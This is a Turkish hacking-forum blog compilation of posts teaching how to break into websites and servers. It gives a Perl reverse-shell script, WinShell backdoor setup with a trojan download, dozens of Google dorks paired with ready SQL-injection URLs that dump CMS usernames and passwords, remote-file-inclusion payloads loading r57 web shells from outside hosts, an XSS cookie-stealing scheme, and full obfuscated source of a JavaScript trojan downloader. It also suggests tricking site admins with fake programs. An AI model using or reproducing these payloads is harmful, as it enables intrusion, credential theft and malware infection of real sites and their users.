30 Haziran 2012 Cumartesi

WinRoot (MKT)

RainMan ,
Kizma Haci neden kiziyon ? Biliyorsunki ben hep Secure + Helper Crew gibi 1 seyim. Kim ne sorsa yardim etmek icin elimden geleni yaparim. Arkadasim forever simdi iyi bak.
sen putty dedin ben yinede her seyini yazayim. Ilk once perl ile Root olmak icin netcat olayi umarim biliyorsundur. 443-cu port acik olur.
CMD-ye

Kod:
perl exploit.pl ip 443
Yaziyoruz ve calistiriyoruz.
Simdide exploit.pl #source :
Kod:
#!/usr/bin/perl

use IO::Socket;

$system = ‘cmd’;

$ARGC=@ARGV;

print “\n–== DConnect PERL Module – Windows BackTrack // Priv8 – Coded By RedGuard ==– \n\n”;

print “\n–==DefacerzCrew ==–\n\n”;

print “\n–==c0d3 by:RedGuard (DefacerzCrew.IN)==–\n\n”;

print “\n–==Mail : redguard[at]hotmail[d0t]com[d0t]tr==–\n\n”;

print “\n–==Special Thanks ; DefeacerzCrew==–\n\n “;

print “\n–==HoMe : www.defacerzcrew.in/root==–\n\n”;

print “\n–==Greetz : RedGuard ~ FuRty ~ mah0ni ~ Sahmat – And All My Friends==–\n\n”;

if ($ARGC!=2) {

print “Usage: $0 [Host] [Port] \n\n”;

die “Ex3mpl3: $0 127.0.0.1 2121 \n”;

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’)) or die print “[-] Unable to Resolve Host\n”;

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print “[-] Unable to Connect Host\n”;

print “[+] Resolving HostName\n”;

print “[+] Connecting… $ARGV[0] \n”;

print “[+] Spawning Shell \n”;

print “[+] Connected to remote host \n”;

SOCKET->autoflush();

open(STDIN, “>&SOCKET”);

open(STDOUT,”>&SOCKET”);

open(STDERR,”>&SOCKET”);

print “\n–== DConnect PERL Module – Windows BackTrack // Priv8 – Coded By RedGuard ==– \n\n”;

print “\n–==DefacerzCrew ==–\n\n”;

print “\n–==c0d3 by:RedGuard (DefacerzCrew.IN)==–\n\n”;

print “\n–==Mail : redguard[at]hotmail[d0t]com[d0t]tr==–\n\n”;

print “\n–==Special Thanks ; DefeacerzCrew==–\n\n “;

print “\n–==HoMe : www.defacerzcrew.in/root==–\n\n”;

print “\n–==Greetz : RedGuard ~ FuRty ~ mah0ni ~ Sahmat – And All My Friends==–\n\n”;

system($system);

#tchaw
Simdi lazimli yerleri editlersiniz.

Simdi putty-e gelelim.
Download :
http://www.chiark.greenend.org.uk/~sgtatham/putty/
C:\Windows\
dizine save ediyoruz.
Putty.exe-ni Ekrana yani desktop-a atmak icinse
# c:\windows aciyoruz windows explorerle
# Gonder > Ekrana (Send to > Desktop)
Kendi Settings-lerinizi Hazirlayin site filan :

Kod:
    * Siteadi: example.com veya s00000.gridserver.com
    * Port: 22 (oldugu gibi birakin)
    * Connection Type: SSH (oldugu gibi birakin)
Open`e Basarak SSH -i baslatiyoruz.
Eger bu baglanma sizin bilgisayarinda ilk kezse asagidaki gibi 1 error ala bilirsiniz :

Yes-e basarak devam ediyoruz.SSH acildiginda boyle 1 sey goruceksiniz :
Kod:
login as:
Domain adini giriyorsun
Sonra kendi passwordunuzu yaziyorsunuz. Bu PuTTy secure icindir :
Kod:
Using keyboard-interactive authentication.
Password:
Bu zaman mouse calismazsa korkmayin.
Kendi SSH Session-una baglandi asagidaki gibi 1 sey goruceksiniz :
Kod:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
example.com@n11:~$
Ve Boylece Command-lari type yani yazmaya baslaya biliriz.
Bundan ilave WinShell v5.0 yontemide vardir.
Coder : janker
Download link & Homepage : http://www.janker.org

Simdi aciklamalara gecelim :
#Port : Acik portunuzu kullana bilirsiniz amma en iyisi 5277 -dir (1-65535 arasinda acik port numaralarini kullanin)
#Password : Normalde eklenmez amma isteseniz ekleyin
#SVName : Servis ismi WinShell olarak koyun
#RegNameKey : WiN9x/ME sistemlerde Winshell olur.
#DISPLAYNAME : Gorev yoneticisindeki isim FTP-eyse "FTP Publishing Service"olur
#AutoInstall : adindan gorunduyu gibi otomatik yuklenme
#DOWNEXEC : Komut FOnksiyonu
#URL ADRESS : uzerinde tepineceyiniz url
#DESTINATION FILE : HardDiske kaydedildiyindeki ismi
#COMPRESS WINSHELLSERVER : .exe formatinda yapar.
Konsol Calismasi icin :
Kod:
net start winshell
Kapanmasi icin
Kod:
net stop winshell
Nasil Baglanacayiz? :
Baslat > Calistir > CMD ile MS DOS aciyoruz
Kod:
C:\>telnet xxx.xxx.xxx.xxx 5277
Password: 1234(koydugunuz sifre)
Help komutu ile yardim ala biliriz :
Kod:
i Install
r Remove
p Path
b reBoot
d shutDown
s Shell
x eXit
q Quit
Download :
CMD>http://.../srv.exe
Example :
Kod:
CMD>p
C:\winnt\winshell.exe 

CMD>http://www.tr-ip.com/TR_ip.exe
Download to C:\winnt\hello.exe...
OK!
Kod:
3. CMD>s
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\>
Hem Trojan servere bulasti hemde Servere baglandik shelle gecdik.
Simdide SSH Komutlari :
Kod:
    * ls Dizinde bulunan her şeyi listeler.
    * ls -a Gizli dosyalar ve dizinlerle beraber listeler.
    * ls -l Bütün dosyaları boyut ve tarihini göstererek listeler.
    * tar -zxpf Uzantısı tar.gz olan sıkıştırılmış dosyaları açar.
    * tar -xpf Uzantısı .tar olan dosyaları açar.
    * gunzip Uzantısı .gz olan dosyaları açar.
    * cp Dosyayı kopyalar.
    * mv Bir dosyayı başka bir dizine taşımanızı sağlar ya da dosya adını değiştirir.
    * mkdir Yeni bir dizin oluşturmanızı sağlar.
    * rmdir Belirtilen dizini silmenizi sağlar.
    * rm Dosya silmenizi sağlar.
    * rm -rf Dizin silmenizi sağlar.
    * cd Belirtilen dizine geçmenizi sağlar.
    * cd .. Bir üst dizine geçmenizi sağlar.
    * cd ~ En üst dizine çıkmanızı sağlar.
    * pwd O anda bulunduğunuz dizini görüntüler.
    * pico Belirtilen dosyayı text editör ile düzenlemenizi sağlar.
    * ftp Belirtilen siteye FTP bağlantısı sağlar.
    * lynx Belirtilen siteyi görüntüler.
    * df Harddisk istatistiklerini gösterir.
    * quota Disk kullanımınızı gösterir.
    * uname İşletim sisteminin durumunu gösterir.
    * whoami Kendi bilgilerinizi gösterir.
    * who Sunucuya bağlı olanları gösterir.
    * last Hesabınıza yapılan en son bağlantıyı gösterir.
    * whereis Belirtilen dosyanın nerede olduğunu gösterir.
    * BitchX IRC programını çalıştırır.
    * mail Postalarınızı kontrol eder.
    * ps -x Sizin çalıştırdığınız işlemleri gösterir.
    * ps -a Sunucuda çalıştırılan tüm işlemleri gösterir.
    * ps -ux Çalıştırılan işlemlerin CPU/RAM kullanımıyla gösterir.
    * kill Pid numarası verilen işlemi durdurur.
    * kill -9 Pid numarası verilen eggdrop işlemini durdurur.
    * killall Belirtilen program türündeki tüm işlemleri durdurur.
    * whatis Belirtilen komutun açıklamasını verir.
    * man Komut hakkında yardım görüntüler
    * passwd Shell hesabınıza girerken kullandığınız şifreyi değiştirmenizi sağlar.
    * vhosts ya da vhost Sistemde bulunan vhostları (virtual host) listeler.(BNC için kullanabilirsiniz)
    * ROOT MAKİNEDEN İP ÖĞRENME: ip addr
    * ROOTTA HESAP AÇMAK : adduser login & chown mavigok /home/login & passwd pass1, passwd pass2
    * reboot: Sunucuya restart atar
    * service mysql restart mysql restart atar
    * service httpd restart apache ye rest atar
    * service httpd stop Sitelere ulaşımı kapatır
    * apf -d ipadresi verilen ipe ban atar
    * service apf restart apf ye restart atar
    * netstat -n sunucuya baglanan ipleri gösterir
    * netstat -a sunucuya bağlanan reseller ipleri gösterir(Proxy kullanmanız fark etmez her zaman gerçek çıkış ipi görünür)
    * pico ssh üzerinden text editor ile dosya içeriğini görme ve düzenlemeye yarar.
    * top Sistem cpu kullanımını gösterir.
    * uptime Uptime Durumu

IP BAN

    * ip banlama
    * iptables -A INPUT -s 85.159.54.48 -j DROP
    * ip ban kaldırma
    * iptables -X INPUT -s 85.159.54.48 -j DROP

Servera dosya çekme

    * wget indirilecek-dosya-adresi

Zip açma

    * unzip dosya.zip

tar.gz açma

    * tar -zxvf dosya.tar.gz

gzip açma

    * gunzip dosya.tar.gz

Dosya sıkıştırmak

    * tar cvzf dosyam.tar.gz sıkıştırılacak-dosya

Sql Yükleme

    * mysql -h dbname -u dbuser -p dbpasword < dbname.sql
Ve buradanda Daha cok Seyler bula bilirsin :
http://the.earth.li/~sgtatham/putty/0.62/htmldoc/
Basarilar + Respect! ^_^ Peace!
Avatar Fearless
Topic : http://www.millikuvvetler.net/showthread.php?t=8652

Hacking Teknikleri

Rainman ,
Haci simdiden cocugun gunahini almayalim
Aslinda Hakli 1 yerdede biz yazilimlar cok veriyoz. Boyle 1 yontem dene bax. Okumaya Basladinmi Basdan oku. Ben simdi 1-2 Acik Postaliycam. Sonra Hack oyretmiyorsunuz demeyin. Ilk once cokertmek istediyin sitenin adminine bayan nikiyle gideceksin TMm saka yapiyordum her neyse devam. Bakiniz Bilirsinizki CMS Sistemleri cokdur. Yani Wordpress var Seditio , Joomla , VBulletin , DLE , Auto 1.2 , Elfchat filan falan felon. Mesela joomla tutalim. Joomla hackingde en cok kullanilan yontemdir. Ve Wordpress-de aynen. Brute Ederiz. Nasilmi? Program Download linki : http://s2.dosya.tc/server16/HNJRBU/brute.zip.html
Video : http://www.youtube.com/watch?v=H4wSTlsSBvo

Bu Joomla ve ya Wordpress Brute Force filan-di. Gelelim tekniyimize. Joomla Mesela Ne gibi aciklari vardir ? :
Modules Acigi :

Kod:
DORK : allinurl: "modules/glossaires"
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
TR Script News :
Kod:
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girisi = /admin
COM ALberghi :
Kod:
DORK 1 : allinurl: "" detail
DORK 2 : allinurl: "com_alberghi"
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Joovideo v1.0 :
Kod:
DORK 1 : allinurl: "com_joovideo" detail
DORK 2 : allinurl: "com_joovideo"
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
Kmite Tell Friend :
Kod:
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://evilc0der.com/r57.txt?
Yontemi: Shell
Panele yonlendirir
FAQ / View FAQ Acigi :
Kod:
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Booking / Days Booking Acigi :
Kod:
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
PN-ENcyklopedia :
Kod:
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
ASPAPP KNOWLADGEBASE :
Kod:
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
En s evdiyim bu Knowledge Base acigidir null
Emagic CMS.NET 4.0 :
Kod:
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
Ve karisik giriyom ortaya J0K3R sagolsun onunla bulmusduk bu dorklarli + kendi exploit-imizide yazdik NOT NULL-larda bile ise yarayan 1 exploit Arsivimdedi. Bunlarda Arsiv-den olsun :
Kod:
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOIT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Kod:
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Kod:
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Kod:
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla Aciklari :
Kod:
    * 2008-03-25 Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability
    * 2008-03-23 Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability
    * 2008-03-23 Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability
    * 2008-03-23 Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability
    * 2008-03-22 Joomla Components custompages 1.1 Remote File Inclusion Vulnerability
    * 2008-03-19 Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability
    * 2008-03-19 Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability
    * 2008-03-19 Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability
    * 2008-03-18 Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability
    * 2008-03-11 Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
    * 2008-03-08 Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability
    * 2008-02-23 Joomla Component simple shop 2.0 SQL Injection Vulnerability
    * 2008-02-20 Joomla Component com_hwdvideoshare SQL Injection Vulnerability
    * 2008-02-18 Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability
    * 2008-02-18 Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability
    * 2008-02-18 Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
    * 2008-02-16 Joomla Component com_galeria Remote SQL Injection Vulnerability
    * 2008-02-16 Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability
    * 2008-02-14 Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
    * 2008-02-14 Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
    * 2008-02-14 Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
    * 2008-02-14 Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability
    * 2008-02-13 Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
    * 2008-02-12 Joomla Component pcchess <= 0.8 Remote SQL Injection Vulnerability
    * 2008-02-12 Joomla Component rapidrecipe <= 1.6.5 SQL Injection Vulnerability
    * 2008-02-08 Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
    * 2008-02-07 Joomla Component com_noticias 1.0 SQL Injection Vulnerability
    * 2008-02-07 Joomla Component com_doc Remote SQL Injection Vulnerability
    * 2008-02-06 Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
    * 2008-02-03 Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability
    * 2008-02-03 Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
    * 2008-02-01 Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln
    * 2008-01-30 Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities
    * 2007-12-31 Joomla Component PU Arcade <= 2.1.3 SQL Injection Vulnerability
Simdi dersinizki bu bos yazini niye yazdim? bunun icin tarihden ilave olan hisseni Googlede aratiyoruz karsimize ya exploit-db.com -dan yada 1337day.com-dan exploitler gelir. Ve gorduyun gibi sadece bu 1 CMS Sistemi olan joomla uzerinde bulunmusdur. Sadece 1 CMS icin hatta bundan fazla var amma Post-da limit varmi yokmu bilmiyom onun icin az koydum. Soylediyim gibi bu 1 cms Sistemi. 1 Sitede nasil acik ararsin? Siteye girersin en asagi bakarsin Hangi CMS sistemi oldugunu oyrenirsin. Mesela Millikuvvetler.net Bunun gibi 1 siteyi hacklasak o zaman CMS sistemine bakarim. Millikuvvetler.net-de
Kod:
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Millikuvvetler.Net, Hack, Forum Hack, Msn Hack, Keylogger, Trojan, Anti Pkk, Anti Lamer
Powered by.vBulletin version 3.8.4 ve bende googlede bu surum aciklari hakkinda ararim. Eminimki her 1 CMS sistemi uzre 1 acik vardir yani CMS sistemini bulursun onun icin googlede Mesela VBulletin v3.8.4 Aciklari diye aratirsin. Ondan sonra Karsina cikan tum vuln/vulnerable(acik)-leleri denersin Elbet 1-i tutur. oda olmazsa ya baska site yada En buyuk Site adminindedi Onunla Konusarak Fake Program yedirirsin Keylogger degil VB-de guzel 1 fake program yazarsin. Budur Her Zaman Soyluyorum Hacking-de Her zaman Mantik kecer )))))) Ve 1 seyde mesela bu sitede acik var bu yol tutmuyor onun Bypass yollarini ararimki Hack icin yararli olsun. Basarilar + Respect! ^_^ & Peace! 
Avatar Fearless.
Topic : http://www.millikuvvetler.net/showthread.php?t=8605

29 Haziran 2012 Cuma

XSRF Qisa Anlatim (Turkish Sub)

Semir ,
Simdi sana biraz acayim. VIdeo cekmeye vaktim olmadigi icin ve evde daha cok Geceleri oldugum icin hem yorgun oluyorum + Programmer-lik 1 yandan basdiriyor + Ayri 1 stresss + depresyon = Down oluyorum. Sanki DDoS yapmislar bana o kadar beynim zonqulduyor. Onun icin elimden geldiyi kadar hizli yazmaya calisiyorum. Simdi ben Sana Kicik kisa 1 malumat vericem bu XSS-XSRF(CSRF)-den faydalanmak hakkinda. Biliyorsunki XSS aciklari onceler cok gunceldi. Simdide guncel 1 keresinde elcibay kardesimiz 1 bank sitesinde XSS acigi bulmus. 1 mantik vardir :
Eger ben arama motorune 1 yazi yazarsam o zaman yazi url-de gorsenir yani mesela ben 1 bank sitesinde arama motoruna "Avatar Fearless" Yaziyorum ve urlde boyle cikiyor(misal) :

Kod:
http://banksitesi.tld/arama.php?soz=Avatar Fearless
Burdan 1 sey cikiyorki ben hem URL-e hemde arama motoruna ne yazarsam o cikicak. Yani mesela ben burda arama.php?soz="Avatar Fearless" yerine
Kod:
<script>alert(1);</script>
Boyle yazarsam bu sozu arama motorunda aratir ve ya bunu arama motorunada yazarsak arama motorunda aranir. Ve gordukki Bu zaman bize popup-da "1" yazisi geldi burdan anliyoruzki sitemizde XSS var. Ve Bu Sitenin URL-inde degil sitenin kendinde. yani ne yazarsak post-da parse olunsa bile input-a gecer. Biz burdan token degerlerimizi alabiliriz. Password-leri belli 1 sey koya biliriz. SImdi bu arama motorundan bildikki bizim sitemizde XSS Acigi var. Yani Cross-Site Scripting. Simdi bizde XSS Sniffer yani CSRF(Cross-Site REquest Forgery).Simdi bizim bU XSRF(CSRF-XSS SNiffer)-imiz Ne ise yarar? SOyle Anlatayim :
Mesela biz bu banksitesi.tld-de XSS bulduk. ve Bu Bank Sitesinde Reg oluyoruz. Bizim Arama Motoruna yazdigimiz 1 JS(JavaScript)-di. Yani site her turlu JS yer. Bizde bunu kendi yonumuze kullaniriz. Sitemizde Reg olduk. Ve Kendi Hakkimizda yani Benim nickimin uzerine basdiginizda Acik Profil Bilgileri bak oyle 1 yer olur ora 1 kod yaziyoruz. O kod Simdi tam hatirlamiyorum Bilgisayara Format aticam diye kaldirdim Flash-da. Simdi o kodumuzu Inject ettik o kod cok uzun olur amma save etdiyimiz Zaman Sadece Mesela bu sozler gorsenir :
Kod:
Click here For More Detail's
Bu 1 URL olur ve Kurban bu URL-e tiklar ve o zaman o yonlenir http://sizinsiteniz.tld/script.php o zaman onun http://banksitesi.tld/-de reg oldugu zaman cookie-leri http://sizinsiteniz.tld/log.txt -ye duser. Iste bu kadar. Bu 1 nevin XSS SNiffer ve ya XSRF/CSRF -dir. Video-su yakinda gelir. Localhost 1 turlu kuramadim format atiyim 1 bilgisayara.
TheKinq ,
Tesekkurler
Topic :  http://www.millikuvvetler.net/showthread.php?t=8368

Java Trojan Downloader

Sorun yok biraz daha genisinden anlatalim. JS Trojan Downloader :
Compromised -(redirect)-&gt; http://217.107.218.***/dot.php -(redirect)-&gt; new.htm -(execute)-&gt; md.htm & shellscript_loader.js -(execute)-&gt; shellscript.js -(install)-&gt; msits.exe

Simdi ilk once new.htm

Kod:
&lt;script language="Javascript"&gt;
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-
10000\;dialogHeight:1\;dialogWidth:1\;").location= "javascript'&lt;SCRIPT SRC=\\'http://217.107.218.***/shellscript_loader.js\\'&gt;&lt;\/script&gt;'";
}&lt;/script&gt;
&lt;script language="javascript"&gt;setTimeout("myiframe.exec Script(InjectedDuringRedirection.toString())",100
);
setTimeout("myiframe.execScript('InjectedDuringRed irection()') ",101);
document.write('&lt;IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=0
HEIGHT=0&gt;&lt;/IFRAME&gt;');&lt;/script&gt;
&lt;script&gt;
x=34;
es="84;66;86;5;73;119;71;89;95;91;12;16;14;88;89;9 5;86;92;67;27;85;69;9
3;88;78;94;108;82;78;74;48;105;107;120;73;79;48;38 ;58;105;37;9;35;41;55
;111;109;113;61;3;59;37;35;39;118;61;53;56;41;48;5 9;49;20;79;0;12;0;28;
93;106;98;6;40;4;8;20;64;28;4;8;30;22;90;23;23;20; 19;30;8;20;9;19;26;60
;239;237;237;241;164;184;166;165;255;225;227;255;2 33;175;181;130;154;25
4;208;252;240;236;184;228;236;224;246;254;178;255; 241;237;196;196;208;1
31;153;133;132;208;192;192;222;206;140;156;222;215 ;146;138;191;185;219;
247;217;211;193;151;211;213;210;216;204;247;148;14 0;142;254;227;249;169
;165;162;172;169;191;236;169;175;187;177;236;242;2 41;153;134;251;158;14
0;138;224;182;180;169;179;179;218;135;139;143;129; 223;201;200;171;211;1
82;183;161;172;167;161;222;188;186;167;213;157;130 ;131;136;195;213;212;
206;204;201;209;305;305;309;301;310;308;318;297;31 3;317;317;292;291;352
;367;358;382;319;369;379;377;303;300;312;373;376;3 71;373;306;373;362;37
0;258;257;342;346;340;320;283;261;348;332;338;351; 259;341;259;348;339;3
23;347;323;320;345;339;323;282;263;262;276;339;351 ;340;346;291;309;380;
356;383;328;332;296;280;294;314;318;316;355;317;29 5;319;294;378;358;356
;357;358;379;376;364;362;363;364;369;382;366;332;3 21;339;335;324;257;26
5;260;285;260;271;261;280;323;268;256;276;264;347; 328;";
var ds=new String(); ads=es.split(";"); k=ads.length-1;
for(var j=0;j&lt;k;j++)
{e=ads[j];d=e^x;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)
&lt;/script&gt;
Shellscript_loader.js
Kod:
function getRealShell() {
myiframe.document.write("&lt;SCRIPT SRC='http://217.107.218.****/shellscript.js'&gt;&lt;\/SCRIPT&gt;");
} document.write("&lt;IFRAME ID=myiframe SRC='about:blank' WIDTH=0 HEIGHT=0&gt;&lt;/IFRAME&gt;"); setTimeout("getRealShell()",100);
shellscript.js
Kod:
var szExt = unescape("%2E%65%78%65");
var szM = unescape("%6D");
var szMMS = szM + szM + "s://";
var szSTR= unescape("%53%74%72%65%61%6D");
var szADO = unescape("%41%44%4F%44%42%2E") + szSTR;
var szMS = "Microsoft"; var szWIN = unescape("%57%69%6E%64%6F%77%73");
var szHTTP = szMS + unescape("%2E%58%4D%4C%48%54%54%50");
var HTTP = new ActiveXObject(szHTTP); var METHOD =
unescape("%47%45%54");
var xx1=unescape("%4D%65%64%69%61"); var xx2 =
unescape("%50%6C%61%79%65%72");
var MP1=unescape("%43%3A%5C%5C%50%72%6F%67%72%61%6D"); var MP2 = " " + xx1
+ " " + xx2;
var szPL = "pl";
var MP = MP1 + " Files\\" + szWIN + MP2 + "\\wm" + szPL +
unescape("%61%79%65%72") + szExt;
var szURL = "http://217.107.218.***/msits.exe";
var i = 8 - 5;
var t = 7 - 6; HTTP.Open(METHOD, szURL, i-3); HTTP.Send();
var ADO = new ActiveXObject(szADO);
ADO.Mode = i; ADO.Type = t;
ADO.Open(); ADO.Write(HTTP.responseBody);
ADO.SaveToFile(MP, i-t); location.href=szMMS;
md.htm
Kod:
&lt;SCRIPT language="javascript"&gt;
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;} catch(e){window.close
();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
&lt;/SCRIPT&gt;
Bu Scob Trojan Downloader Source via JS -ydi.
Kod:
...
10/26/2008 5:58:21 PM Deleted hyang C:\Program Files\Internet Explorer
   \IEXPLORE.EXE C:\Documents and Settings\hyang\Local Settings
   \Temporary Internet Files\Content.IE5\UVQLMT01\ilink[1].htm
   \000000a0.js JS/Downloader.gen (Trojan)

10/26/2008 6:58:24 PM Script execution blocked hyang IEXPLORE.EXE
   (http://x.x.cn/swf/fx.htm) Script executed by IEXPLORE.EXE
   JS/Downloader.gen (Trojan)

10/26/2008 6:01:07 PM Deleted hyang C:\WINDOWS\system32\heb.exe
   C:\WINDOWS\SYSTEM32\PCAXYOQRXA.EXE PWS-Mmorpg.gen (Trojan)
...
Zaman tutulumuda budur. & Respect! ^_^ Peace!  
Topic : http://www.millikuvvetler.net/showthread.php?t=8518

Wordpress Vulnerable'S + PHPMyAdmin Secure

Eh Gordumki Hepiniz bu konu uzerinde toplasdiniz bende 1 yorum yapayim sizde dagilin Saka Baslayalim. Wordpress dedin. Wordpress-de bile plugin-lerde RFI aciklari bulunmaktda. Aciklar coktur bazi Wordpress ISS aciklarida olur. Baslayalim RFI-den. Plugins directory-sinde bula bilirsiniz :

Kod:
/plugins/links/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/polls/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
